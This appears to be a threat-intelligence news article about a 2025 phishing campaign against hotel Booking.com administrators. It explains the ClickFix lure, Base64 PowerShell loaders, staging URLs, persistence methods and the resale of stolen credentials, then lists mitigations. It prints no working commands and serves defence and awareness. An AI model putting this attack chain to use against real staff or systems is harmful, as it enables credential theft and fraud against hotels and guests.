Cybercriminals Exploit Booking.com Accounts to Target Travelers in Sophisticated Phishing Scheme
A sophisticated phishing campaign, known as I Paid Twice, has been actively targeting the hospitality industry and its patrons by compromising hotel administrator accounts on Booking.com. This operation, which began in April 2025 and continues to pose a threat as of October 2025, combines credential theft with multi-stage malware deployment, presenting a significant risk to the global travel sector.
Attack Methodology
The attack initiates with cybercriminals sending spear-phishing emails to hotel administrators. These emails are meticulously crafted to mimic legitimate communications from Booking.com, referencing actual guest reservations and platform activities to enhance their credibility. Embedded within these emails are malicious links that, when clicked, redirect recipients through a complex infrastructure before deploying a social engineering tactic known as ClickFix.
Upon interacting with the ClickFix mechanism, victims unknowingly execute commands that install malware on their systems. This malware grants attackers access to professional credentials for booking platforms such as Booking.com and Expedia, enabling them to manipulate reservations and extract sensitive information.
Commercialization of Stolen Credentials
The stolen credentials are monetized through Russian-speaking cybercrime forums and marketplaces. Compromised Booking.com accounts, especially those managing multiple properties in developed countries, are sold for prices ranging from $5 to $5,000, depending on their activity levels and reservation volumes. This commodification has led to a self-sustaining fraud ecosystem where specialized services handle various stages of the attack chain.
Technical Breakdown of the Infection Mechanism
The infection process begins when hotel administrators receive phishing emails from compromised accounts. These emails contain malicious URLs that follow a specific pattern, such as hxxps://{randomname}[.]com/[a-z0-9]{4}. These domains utilize sophisticated JavaScript to check iframe contexts before redirecting users to ClickFix pages.
The redirection infrastructure acts as a commercialized Traffic Distribution System (TDS), concealing the attackers’ primary infrastructure from detection and takedown efforts. Each redirection step carefully preserves URL patterns containing keywords like admin and extranet to maintain perceived legitimacy during the social engineering phase.
Upon reaching the ClickFix pages, users encounter Booking.com branding alongside a reCAPTCHA interface prompting them to copy commands. The copied command contains Base64-encoded PowerShell instructions that execute without user awareness. This initial PowerShell command downloads secondary scripts from staging URLs ending in /bomla, orchestrating the infection progression.
The loader gathers comprehensive system information, including machine name, current user, Windows version, and installed antivirus products, before downloading a ZIP archive containing executable and dynamic link library files. Persistence mechanisms employ multiple techniques, including Windows registry modifications and DLL side-loading, to ensure the malware remains active on the infected system.
Implications for the Hospitality Industry
This phishing campaign underscores the evolving tactics of cybercriminals targeting the hospitality sector. By compromising hotel administrator accounts, attackers can manipulate reservations, access sensitive guest information, and potentially cause financial losses for both hotels and their patrons.
Recommendations for Mitigation
To protect against such sophisticated phishing attacks, the following measures are recommended:
1. Employee Training: Regularly educate staff on recognizing phishing attempts and the importance of verifying the authenticity of emails, especially those requesting sensitive information or containing links.
2. Multi-Factor Authentication (MFA): Implement MFA for all accounts, particularly those with administrative privileges, to add an extra layer of security.
3. Regular Security Audits: Conduct periodic reviews of security protocols and access controls to identify and address potential vulnerabilities.
4. Email Filtering Solutions: Deploy advanced email filtering systems to detect and block phishing emails before they reach the inbox.
5. Incident Response Plan: Develop and maintain a comprehensive incident response plan to quickly address and mitigate the effects of a security breach.
By adopting these proactive measures, organizations within the hospitality industry can enhance their defenses against phishing campaigns and protect both their operations and their guests from cyber threats.
